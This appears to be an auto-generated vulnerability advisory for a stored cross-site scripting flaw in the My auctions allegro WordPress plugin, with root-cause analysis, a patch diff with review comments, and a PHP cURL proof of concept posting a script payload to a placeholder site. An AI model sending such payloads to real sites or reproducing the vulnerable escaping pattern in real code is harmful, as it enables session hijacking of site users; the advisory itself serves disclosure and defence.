Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-67943: My auctions allegro <= 3.6.32 – Unauthenticated Stored Cross-Site Scripting (my-auctions-allegro-free-edition)

Severity: High (CVSS 7.2)
CWE: 79
Vulnerable Version: 3.6.32
Patched Version: 3.6.33
Disclosed: January 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-67943:
This vulnerability is an unauthenticated stored Cross-Site Scripting (XSS) flaw in the My auctions allegro WordPress plugin. The issue affects the plugin’s core controller component, allowing attackers to inject malicious scripts that execute when a user views a compromised page. The CVSS score of 7.2 indicates a high severity.

Atomic Edge research identifies the root cause as insufficient input sanitization in the `getParam` method within the file `/my-auctions-allegro-free-edition/core/controller.php`. The vulnerable version, 3.6.32, only applied the `esc_sql()` function to user-supplied parameters retrieved from `$_REQUEST`. This function is designed for SQL escaping and does not neutralize HTML or JavaScript characters, leaving the output vulnerable to XSS when the parameter value is later echoed to the browser without proper output escaping.

Exploitation occurs via an HTTP request to any plugin endpoint that calls the `getParam` method. An attacker can send a crafted request containing a malicious payload in any parameter processed by this method. For example, a GET or POST request to a plugin page with a parameter like `id=alert(document.cookie)` would be accepted. The payload would be stored and later rendered unsanitized, executing the script in the victim’s browser context.

The patch modifies the `getParam` method in `/my-auctions-allegro-free-edition/core/controller.php`. It wraps the return value in `sanitize_text_field()`, so the line becomes `return ! isset ( $_REQUEST [$param] ) ? null : sanitize_text_field(esc_sql($_REQUEST [$param]));`. The `sanitize_text_field()` WordPress function strips invalid UTF-8 characters, collapses extra whitespace, and strips HTML tags, which neutralizes the tag-based XSS payloads described above. The patch also adds a check in `functions.php` that rejects instance names containing certain characters, and passes an SQL query in `auctions.php` through `$wpdb->prepare()`.
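To make the root cause concrete, the following is an added example (not code from the plugin or from this advisory) that contrasts the 3.6.32 pattern, the 3.6.33 pattern, and output escaping per context. It assumes plain-PHP stand-ins for the WordPress helpers so it runs outside WordPress: addslashes() for esc_sql(), htmlspecialchars() for esc_html(), and strip_tags() for the tag stripping that sanitize_text_field() performs.

```php
<?php
// Added example, not code from the plugin or the advisory. Stand-ins so it runs
// without WordPress (assumption): addslashes() for esc_sql(), htmlspecialchars()
// for esc_html(), strip_tags() for the tag stripping done by sanitize_text_field().
function esc_sql_like(string $v): string { return addslashes($v); }
function esc_html_like(string $v): string { return htmlspecialchars($v, ENT_QUOTES, 'UTF-8'); }
function sanitize_text_like(string $v): string { return trim(strip_tags($v)); }

// 3.6.32 pattern: "escape" for SQL at input, then echo the value into HTML later.
// addslashes() only touches quotes and backslashes, so < and > reach the page intact.
function render_vulnerable(array $request, string $param): string {
    $value = isset($request[$param]) ? esc_sql_like($request[$param]) : '';
    return '<span class="auction-id">' . $value . '</span>';
}

// 3.6.33 pattern: strip tags at input. This stops the tag-based payload, but the
// original value is lost and the output is still not escaped for its HTML context.
function render_patched(array $request, string $param): string {
    $value = isset($request[$param]) ? sanitize_text_like(esc_sql_like($request[$param])) : '';
    return '<span class="auction-id">' . $value . '</span>';
}

// Recommended pattern: keep the raw value and escape it where it is printed; if the
// same value is ever used in SQL, it goes through $wpdb->prepare() at that call site.
function render_hardened(array $request, string $param): string {
    $raw = $request[$param] ?? '';
    return '<span class="auction-id">' . esc_html_like($raw) . '</span>';
}

// Constructed sample input of the kind the advisory describes.
$request = ['id' => '<script>alert(1)</script>'];

foreach (['render_vulnerable', 'render_patched', 'render_hardened'] as $fn) {
    $html = $fn($request, 'id');
    $live = strpos($html, '<script>') !== false ? 'live script tag in output' : 'no live script tag';
    printf("%-18s %-60s -> %s\n", $fn, $html, $live);
}
```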

Successful exploitation allows an unauthenticated attacker to inject arbitrary JavaScript into pages served by the plugin. This script executes in the context of any user viewing the infected page, potentially leading to session hijacking, administrative actions performed on behalf of the user, or defacement of the site.

Differential between vulnerable and patched code

Code Diff
--- a/my-auctions-allegro-free-edition/core/controller.php
+++ b/my-auctions-allegro-free-edition/core/controller.php
@@ -123,7 +123,7 @@
 		return $this->buttons;
 	}
 	public function getParam($param) {
-		return ! isset ( $_REQUEST [$param] ) ? null : esc_sql($_REQUEST [$param]);
+		return ! isset ( $_REQUEST [$param] ) ? null : sanitize_text_field(esc_sql($_REQUEST [$param]));
 	}
 	public function getParams() {
         $request = $_REQUEST;
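Review bot: wrapping the return in `sanitize_text_field()` is input sanitization, not output escaping, so every template that prints `getParam()` into an HTML body, attribute or script context still needs `esc_html()`, `esc_attr()` or `esc_js()` at the point of output; the stripped value is also lossy for legitimate input. The inner `esc_sql()` is the wrong tool here as well: WordPress already slashes `$_REQUEST`, so values that never reach SQL pick up extra backslashes, while values that do reach SQL should go through `$wpdb->prepare()` at the query site. Suggest `return isset($_REQUEST[$param]) ? wp_unslash($_REQUEST[$param]) : null;` and escaping per context where the value is consumed.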
--- a/my-auctions-allegro-free-edition/core/functions.php
+++ b/my-auctions-allegro-free-edition/core/functions.php
@@ -173,6 +173,10 @@
      */
     public static function getInstance($instance, $type = 'Model', $rec = false)
     {
+        if (strpos($instance, '-') !== false || strpos($instance, '.') !== false || strpos($instance, '/') !== false) {
+            return false;
+        }
+
         $className = call_user_func_array(self::$defaultClass . '::parseToClass', [$instance, $type]);
         $path      = call_user_func_array(self::$defaultClass . '::parseToFile', [$instance, $type]);

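Review bot: the new check in `getInstance()` is a denylist of three characters, and the characters chosen (`-`, `.`, `/`) suggest `$instance` feeds a file path via `parseToFile`; a backslash is not rejected, and whatever else `parseToClass`/`parseToFile` do with unusual input is not visible in this hunk. An allowlist is easier to reason about, for example `if (!preg_match('/^[A-Za-z0-9_]+$/', $instance)) { return false; }`. The silent `return false` also changes the function's contract, so callers that expect an object should be checked for how they handle `false`, and the rejection is worth logging for detection purposes.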
--- a/my-auctions-allegro-free-edition/my-auctions-allegro-free-edition.php
+++ b/my-auctions-allegro-free-edition/my-auctions-allegro-free-edition.php
@@ -2,7 +2,7 @@
 /*
  * Plugin Name: My auctions allegro
  * Plugin URI: https://wordpress.org/plugins/my-auctions-allegro-free-edition
- * Version: 3.6.32
+ * Version: 3.6.33
  * Description: Plug-in display auctions from popular polish auction website called allegro.pl, also from 1.7 version you can import basic information from auctions to WooCommerce
  * Author: WPHocus
  * Author URI: https://wphocus.com
--- a/my-auctions-allegro-free-edition/src/model/auctions.php
+++ b/my-auctions-allegro-free-edition/src/model/auctions.php
@@ -333,7 +333,7 @@
         $set    = $column . ' = ' . $column . ' + 1';
         $where  = sprintf('auction_id = %s AND auction_profile_id = %d', $auctionId, $profileId);

-        $this->getWpdb()->query(sprintf("UPDATE %s SET %s WHERE %s", $this->getTable(), $set, $where));
+        $this->getWpdb()->query($this->getWpdb()->prepare("UPDATE %s SET %s WHERE %s", $this->getTable(), $set, $where));
     }

     public function getMostPopularAuctions($count)
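Review bot: `$wpdb->prepare()` treats `%s` as a quoted string literal, so this call produces `UPDATE 'table' SET 'col = col + 1' WHERE 'auction_id = ...'`, which is not valid SQL, and it still does not parameterize `$auctionId`, which is interpolated with `sprintf('%s')` in the `$where` line two lines above. Put the placeholders on the values themselves: `$this->getWpdb()->prepare("UPDATE {$this->getTable()} SET {$column} = {$column} + 1 WHERE auction_id = %s AND auction_profile_id = %d", $auctionId, $profileId)`, with `$column` validated against a fixed list of column names (or passed as `%i` on WordPress 6.2 and later, which supports identifier placeholders).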

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-67943 - My auctions allegro <= 3.6.32 - Unauthenticated Stored Cross-Site Scripting

// Configure the target WordPress site URL
$target_url = 'http://target-site.com/';

// Identify a page or endpoint that uses the vulnerable plugin.
// The exact endpoint is plugin-dependent, but the attack vector is any parameter via GET or POST.
// This example targets a frontend shortcode page, using a POST request to simulate form interaction.
$exploit_url = $target_url . '?page_with_plugin_shortcode=1';

// Malicious payload to inject. This is a basic proof-of-concept alert.
$payload = '<script>alert("Atomic Edge XSS Test");</script>';

// Parameter name to attack. This must be a parameter the plugin's getParam method processes.
// The exact parameter name requires reconnaissance; 'id' or 'profile' are common examples.
$parameter = 'id';

// Initialize cURL session
$ch = curl_init();

// Set the target URL
curl_setopt($ch, CURLOPT_URL, $exploit_url);

// Use POST method and send the malicious payload in the specified parameter
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([$parameter => $payload]));

// Capture the response for analysis
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

// Execute the request
$response = curl_exec($ch);

// Check for errors
if (curl_errno($ch)) {
    echo 'cURL Error: ' . curl_error($ch);
} else {
    // A successful request indicates the payload was likely accepted.
    // Verification requires visiting the injected page and observing script execution.
    echo "Payload sent. Check the target page for script execution.\n";
    echo "HTTP Code: " . curl_getinfo($ch, CURLINFO_HTTP_CODE) . "\n";
}

// Close cURL session
curl_close($ch);
?>
